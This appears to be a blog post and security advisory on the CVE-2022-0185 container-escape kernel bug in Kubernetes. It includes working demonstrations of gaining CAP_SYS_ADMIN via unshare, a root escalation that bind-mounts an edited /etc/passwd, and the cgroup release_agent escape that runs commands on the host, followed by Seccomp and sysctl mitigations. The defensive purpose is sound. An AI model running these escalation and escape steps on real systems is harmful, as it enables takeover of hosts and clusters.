High severity! Alert: a new container escape vulnerability affecting Kubernetes

Author: 米開朗基楊, KubeSphere evangelist and cloud-native addict

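On January 18, 2022, Linux maintainers and vendors disclosed a heap buffer overflow in the legacy_parse_param function of the Linux kernel's filesystem context functionality (kernel 5.1-rc1 and later). The vulnerability is tracked as CVE-2022-0185 and is rated high severity, with a severity score of 7.8.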

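The vulnerability allows out-of-bounds writes in kernel memory. By exploiting it, an unprivileged attacker can bypass the restrictions of any Linux namespace and escalate privileges to root. For example, an attacker who has compromised one of your containers can escape from the container and escalate privileges on the host.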

The bug was introduced in Linux kernel 5.1-rc1 in March 2019. A patch released on January 18 fixes it, and all Linux users are advised to install a kernel version that includes the fix.
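
As a rough first triage step, the version range above can be checked programmatically. The sketch below is only an illustration: the function names are hypothetical, and it checks nothing more than whether a kernel release string is 5.1 or later. It cannot tell whether a distribution has already backported the fix, so a positive result means "check your vendor advisory", not "vulnerable".

```python
import re


def parse_kernel_release(release: str) -> tuple[int, int]:
    """Extract (major, minor) from a release string such as '5.4.0-96-generic'."""
    match = re.match(r"(\d+)\.(\d+)", release)
    if match is None:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return int(match.group(1)), int(match.group(2))


def contains_vulnerable_code_path(release: str) -> bool:
    """Return True if the kernel is 5.1 or later, where the bug was introduced.

    This says nothing about whether the fix has been applied or backported.
    """
    return parse_kernel_release(release) >= (5, 1)
```

On a Linux host it could be called as contains_vulnerable_code_path(platform.release()) after importing the standard platform module.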

Vulnerability details

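The vulnerability is caused by an integer underflow in the legacy_parse_param function of the filesystem context code (fs/fs_context.c). The filesystem context is used to create the superblock when a filesystem is mounted or remounted. The superblock records the characteristics of a filesystem, such as block size and file size, as well as its storage blocks.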

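Sending 4095 bytes or more of input to legacy_parse_param bypasses the input length check and leads to an out-of-bounds write, which triggers the vulnerability. An attacker can use this to write malicious data to other parts of memory, either crashing the system or executing arbitrary code to escalate privileges.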
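
To make the underflow concrete, here is a simplified model of that length check. It is a sketch under assumptions, not the kernel code: it assumes the check compares the new parameter's length against PAGE_SIZE - 2 - size in unsigned 64-bit arithmetic, with PAGE_SIZE equal to 4096, and the function names are hypothetical.

```python
PAGE_SIZE = 4096
UNSIGNED_LONG_MODULUS = 2 ** 64  # assumption: 64-bit unsigned arithmetic


def remaining_space(size: int) -> int:
    """Model `PAGE_SIZE - 2 - size` evaluated as an unsigned value.

    `size` is the number of bytes already accumulated in the buffer.
    """
    return (PAGE_SIZE - 2 - size) % UNSIGNED_LONG_MODULUS


def check_rejects(size: int, length: int) -> bool:
    """Model the bounds check: reject when `length` exceeds the space left."""
    return length > remaining_space(size)
```

In this model check_rejects(4000, 200) is true because only 94 bytes remain, but once size reaches 4095 the subtraction wraps around to a huge positive number, so check_rejects(4095, 200) is false and the write would be allowed to run past the end of the page.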

The input to legacy_parse_param is supplied through the fsconfig system call, which configures the filesystem creation context (for example, the superblock of an ext4 filesystem).

// Use the fsconfig system call to add the NUL-terminated string pointed to by val
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

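To use the fsconfig system call, an unprivileged user needs at least the CAP_SYS_ADMIN capability in their current namespace. This means that being able to enter another namespace in which the user holds that capability is enough to exploit the vulnerability.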

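If an unprivileged user does not have CAP_SYS_ADMIN, an attacker can obtain it with the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. unshare lets a process create new namespaces, here a new user namespace and a new mount namespace, in which it holds the capabilities needed for further attacks. This technique matters a great deal in Kubernetes and the wider container world, which rely on Linux namespaces to isolate Pods, because an attacker can use it in a container escape attack. Once the escape succeeds, the attacker gains full control of the host operating system and of every container running on it, and can go on to attack other machines on the internal network or even deploy malicious containers in the Kubernetes cluster.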

The research team that discovered the vulnerability published exploit code and a proof of concept on GitHub on January 25.

PoC

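Docker and other container runtimes apply a Seccomp profile by default that blocks processes in a container from making dangerous system calls, which protects the Linux namespace boundary.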

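Seccomp (short for secure computing mode) was introduced in Linux kernel 2.6.12 (March 8, 2005). It restricted the system calls available to a process to four: read, write, _exit, and sigreturn. This original mode is an allowlist: the process may only use those four system calls on file descriptors that are already open, and if it attempts any other system call the kernel terminates it with SIGKILL or SIGSYS.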

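By default, however, Kubernetes does not apply any Seccomp or AppArmor/SELinux profile to restrict the system calls of a Pod. This is dangerous: processes in a Pod can freely make dangerous system calls and look for a chance to gain the privileges they need (such as CAP_SYS_ADMIN) for further attacks.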

Let's look at a Docker example first. In a standard Docker environment the unshare command does not work, because Docker's Seccomp filter blocks the system call the command uses.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Now look at a Kubernetes Pod:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

As shown, the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain it with the unshare command.

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh
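
The same information that pscap prints can be read from the CapEff line of /proc/<pid>/status, which holds the effective capability set as a hexadecimal bitmask. The sketch below decodes that mask and tests the CAP_SYS_ADMIN bit (bit 21 in linux/capability.h). The function names are hypothetical, and the masks in the usage note are illustrative values rather than output captured from the session above.

```python
CAP_SYS_ADMIN = 21  # bit number defined in <linux/capability.h>


def effective_caps(status_text: str) -> int:
    """Return the effective capability bitmask from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line found")


def has_cap_sys_admin(status_text: str) -> bool:
    """Return True if the CAP_SYS_ADMIN bit is set in the effective set."""
    return bool((effective_caps(status_text) >> CAP_SYS_ADMIN) & 1)
```

A mask of 00000000a80425fb encodes exactly the fourteen capabilities listed for bash above and does not include CAP_SYS_ADMIN, while a full mask such as 000001ffffffffff does. For the current process, pass in the contents of /proc/self/status.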

So what can you do with CAP_SYS_ADMIN? Here are two examples showing how it can be used to compromise a system.

Escalating an ordinary user to root!

The following trick escalates an ordinary user on the host directly to root.

First grant python3 the CAP_SYS_ADMIN capability (note that this cannot be done on a symlink, only on the actual file).

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create an ordinary user.

$ useradd test -d /home/test -m

Then switch to that user and go to its home directory.

$ su test
$ cd ~

Copy /etc/passwd to the current directory and change the root user's password to "password".

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# Change root:x on the first line to root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Bind-mount the modified passwd file over /etc/passwd.

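$ cat mount-passwd.py
import ctypes
import os

# Load libc with errno tracking so that a failed mount(2) can be reported
libc = ctypes.CDLL("libc.so.6", use_errno=True)
libc.mount.argtypes = (ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p,
                       ctypes.c_ulong, ctypes.c_char_p)

MS_BIND = 4096  # bind-mount flag from <sys/mount.h>
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"

# Bind-mount the modified copy over /etc/passwd and fail loudly on error
if libc.mount(source, target, filesystemtype, MS_BIND, options) != 0:
    err = ctypes.get_errno()
    raise OSError(err, os.strerror(err))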

$ python3 mount-passwd.py

And now for the moment of truth! Switch directly to the root user and enter the password "password".

$ su root
Password: 
root@coredns:/home/test#

Amazing, we are now root...

Let's check whether we really have root privileges:

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Yep, that's root all right.

Finally, remember to unmount /etc/passwd.

$ umount /etc/passwd

So, System Reboot Engineers, go and check right now whether any of the ordinary user accounts you have handed out can reach the CAP_SYS_ADMIN capability.
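
One way to run that check is to list file capabilities with getcap -r / and look for binaries that carry cap_sys_admin. The sketch below only parses the text output. The function name is hypothetical, and it assumes one file per line in either the older "path = caps" layout shown earlier or the newer "path caps" layout. It also does not catch files that are granted every capability without naming them individually.

```python
def files_with_cap_sys_admin(getcap_output: str) -> list[str]:
    """Return the paths from `getcap` output whose capabilities name cap_sys_admin."""
    paths = []
    for line in getcap_output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            # Older libcap layout: "/usr/bin/python3.8 = cap_sys_admin+ep"
            path, caps = line.split(" = ", 1)
        else:
            # Newer libcap layout: "/usr/bin/python3.8 cap_sys_admin=ep"
            path, _, caps = line.rpartition(" ")
        if "cap_sys_admin" in caps.lower():
            paths.append(path)
    return paths
```

Feeding it the getcap line from the example above returns ["/usr/bin/python3.8"], which is exactly the kind of binary an ordinary user could abuse.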

Viewing all host processes from inside a container!

Now a container example. The following trick lets you list every process running on the host from inside a container.

We don't need the --privileged flag to run a privileged container; that would be no fun.

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

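Next, run the commands below in the container. The end result is that ps aux is executed on the host and its output is saved to the /output file in the container.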

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

In the end you can see all of the processes running on the host from inside the container:

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

I won't explain what each of these commands does. If you're interested, work through them with the help of the comments.

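What is certain is that CAP_SYS_ADMIN opens up many more possibilities for an attacker, both on the host and in containers. In container environments especially, if the kernel cannot be upgraded for reasons beyond our control, we need to look for other solutions.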

Solutions

Container level

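Kubernetes lets you attach a Seccomp or AppArmor profile to workloads through the SecurityContext, which protects Pods, Deployments, StatefulSets, DaemonSets, and so on. Starting with v1.22, Kubernetes can also apply the runtime's default Seccomp profile to all workloads automatically, but that feature is currently in Alpha. In the meantime you can reference the runtime default profile, or your own Seccomp or AppArmor profile, explicitly in the SecurityContext. For example: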

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try to obtain CAP_SYS_ADMIN with unshare.

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output shows that the unshare system call was blocked, so an attacker cannot use it to gain the capability and mount an attack.
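
To find workloads that still lack this protection, the manifest check can be automated. The sketch below is a minimal illustration with a hypothetical function name: it takes a Pod manifest that has already been loaded into a Python dict (for example from kubectl get pod -o json) and reports containers that have no seccompProfile, or an Unconfined one, at either the container or the Pod level. It assumes no cluster-wide default is in effect.

```python
def containers_without_seccomp(pod: dict) -> list[str]:
    """Return names of containers in a Pod manifest that have no Seccomp profile."""
    spec = pod.get("spec", {})
    # A Pod-level profile applies to containers that do not set their own
    pod_profile = (
        spec.get("securityContext", {}).get("seccompProfile", {}).get("type")
    )
    unprotected = []
    for container in spec.get("containers", []):
        profile = (
            container.get("securityContext", {})
            .get("seccompProfile", {})
            .get("type", pod_profile)
        )
        if profile in (None, "Unconfined"):
            unprotected.append(container["name"])
    return unprotected
```

For the protected Pod defined in pod-test.yaml this returns an empty list, while a Pod created the way the earlier kubectl run example does would be reported.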

Host level

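Another option is to disable user namespaces for unprivileged users at the host level, which does not require a reboot. On Ubuntu, for example, the two commands below take effect immediately and also persist across reboots.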

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

On Red Hat family systems, the following commands achieve the same effect.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
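
To confirm that one of these settings is active on a host, the corresponding files under /proc/sys can be read back. This is a minimal sketch with hypothetical function names. It treats a missing file as "setting not available", since kernel.unprivileged_userns_clone only exists on kernels that carry the Debian/Ubuntu patch, and the reader is injectable so the logic can be exercised without touching the real system.

```python
from pathlib import Path

# sysctl name -> path under /proc/sys
USERNS_SYSCTLS = {
    "kernel.unprivileged_userns_clone": "/proc/sys/kernel/unprivileged_userns_clone",
    "user.max_user_namespaces": "/proc/sys/user/max_user_namespaces",
}


def read_sysctl(path: str):
    """Return the integer value stored at `path`, or None if it cannot be read."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None


def unprivileged_userns_disabled(read=read_sysctl) -> bool:
    """Return True if either sysctl is present and set to 0."""
    return any(read(path) == 0 for path in USERNS_SYSCTLS.values())
```

Calling unprivileged_userns_disabled() with no arguments checks the live host. A False result means unprivileged users can still create user namespaces.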

To summarize the recommendations for handling this vulnerability:

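If your environment can tolerate patching the kernel and rebooting, apply the patch or upgrade the kernel.
Reduce the use of privileged containers that have access to CAP_SYS_ADMIN.
For unprivileged containers, make sure a Seccomp filter blocks calls to unshare to reduce the risk. Docker does this by default; Kubernetes needs extra configuration.
In the future, a Seccomp profile can be enabled for all workloads in a Kubernetes cluster. This feature is still in Alpha and must be turned on through a feature gate.
Disable user namespaces for unprivileged users at the host level.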

Final thoughts

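Container environments are complex, especially distributed scheduling platforms such as Kubernetes. Every component has its own lifecycle and attack surface and can easily expose security risks, so cluster administrators must pay attention to security in every detail. In the vast majority of cases the security of containers depends on the security of the Linux kernel, so we need to keep a constant watch for security issues and apply the corresponding fixes as quickly as possible.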
